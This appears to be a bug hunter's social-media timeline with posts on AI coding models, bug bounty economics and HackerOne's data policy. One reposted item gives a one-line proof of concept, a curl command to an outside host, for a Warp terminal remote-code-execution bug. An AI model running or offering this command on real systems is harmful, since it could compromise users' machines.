Bug Hunter & Tool Builder.

Joined July 2025
60 Photos and videos
GPT-5.5 Pro is the most underrated LLM right now. The accuracy, understanding, and depth it delivers are on a whole different level. Can we get this in Codex, @thsottiaux?
9
796
Jun 13
This is a very cool technique. I think we're going to see a lot of similar vulns.
TUIs getting stronger only means they’re also making it fun to hack. @warpdotdev terminal RCE by @rootxharsh and @HacktronAI PoC: run this in warp terminal and get pwned. curl htxp://rce.ee/warp-pwn.php Details below:
1
14
1,616
Jun 12
How do you test for dependency confusing bugs these days? PyPi keeps deleting my accounts😩
1
13
1,296
Jun 11
What does successful AI leverage actually look like to you? Working more because you can do more? Working less because you need to do less? Making more money? I’m curious how people measure this.
2
3
485
Jun 11
This is how you use AI for bug hunting. Amazing write up👏
Jun 11
Hacking Google with A.I. for $500,000 brutecat.com/r/hacking-googl…
2
68
8,398
Jun 10
Me: asking girls out Girls:
3
535
Jun 10
If you need AI skills:
69,000 Claude Skills, one index. 📚 Huge credit to @Behi_Sec for this repo — skills for Claude Code, Cursor & Windsurf, organized by category. Pair it with Atlas Cloud's unified API for the 300 models behind your agents. #API #Atlascloud #Claude #ClaudeCode #AIAgents #MCP #Cursor #Windsurf #DevTools
8
878
Jun 10
Don’t get too excited about Fable 5, guys. It blocks basically every cybersecurity-related request.
6
70
6,439
Jun 8
Codex is surprisingly good at finding edge cases. Just point it at a fixed bug, and ask it to find bypasses. You’ll often end up with variants the original fix didn’t consider.
2
4
74
4,256
Jun 7
And this will create a huge number of vulnerabilities 😃
A developer posted this on Reddit, and I haven't stopped thinking about it.
1
13
1,492
Jun 5
That's it.
“Bug bounty is dying” is noise. Lock in. Make money. Use AI to 10x your output. If it eventually dries up, you’ll have enough capital to start that biz or enough experience to land a job. Simple as that.
21
1,743
Jun 3
OK, thank you!
Yesterday, we announced new product capabilities, and some of our messaging created confusion. We want to be direct. Researcher submissions are not used to train, fine-tune, or otherwise improve generative AI models. This applies across our platform, including H1 Continuous Testing, H1 Agentic PTaaS, and Hai. Third-party model providers we work with are also prohibited from retaining or using researcher data for their own training. We've updated our website language to reflect this more clearly. We heard your concerns, and we take them seriously.
9
1,548
Jun 3
Hackerone to bug hunters:
the job market to a junior dev
2
16
1,419
Jun 3
What’s wrong with Hackerone? They do whatever they want with our data, and no one from this company is even responding to our concerns? We need to do something.
I'm not sure the community will like this. @Hacker0x01 will now reuse your novel techniques / exploits / old reports to look for vulns on the rest of the customer's infra. I guess they will add you as collab and give you a bounty, right? right?!
3
1
34
3,651
Jun 2
It's a really good thing seeing people buy your product. And it's never been easier to build valuable products.
1
1
6
931
Jun 1
Guys, what secret discovery tool do you use? Trufflehog is kinda weird.
7
1
72
8,747
May 31
How to get rich as a bug hunter:
May 29
“Mom, how did we got so rich?” “You father stopped d*cking around with bug bounty programs and sold his exploits to Western governments”
11
1,076
May 31
This is my current stack: Terminal: cmux Coding model: GPT-5.5(codex) Open source model: Deepseek V4 Pro(Max) Harness for open source models: Droid Terminal editor: Fresh editor What's your pick?
3
2
40
2,744